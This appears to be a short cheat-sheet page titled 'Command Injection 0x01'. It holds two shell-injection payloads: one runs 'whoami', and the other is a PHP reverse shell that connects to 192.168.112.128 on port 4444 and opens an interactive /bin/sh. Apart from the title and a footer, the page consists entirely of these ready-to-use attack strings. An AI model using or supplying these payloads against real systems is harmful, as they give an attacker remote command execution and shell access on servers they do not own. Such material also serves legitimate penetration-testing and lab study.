Command Injection 0x01

; whoami ; #
; php -r '$sock=fsockopen("192.168.112.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");' ; #

Last updated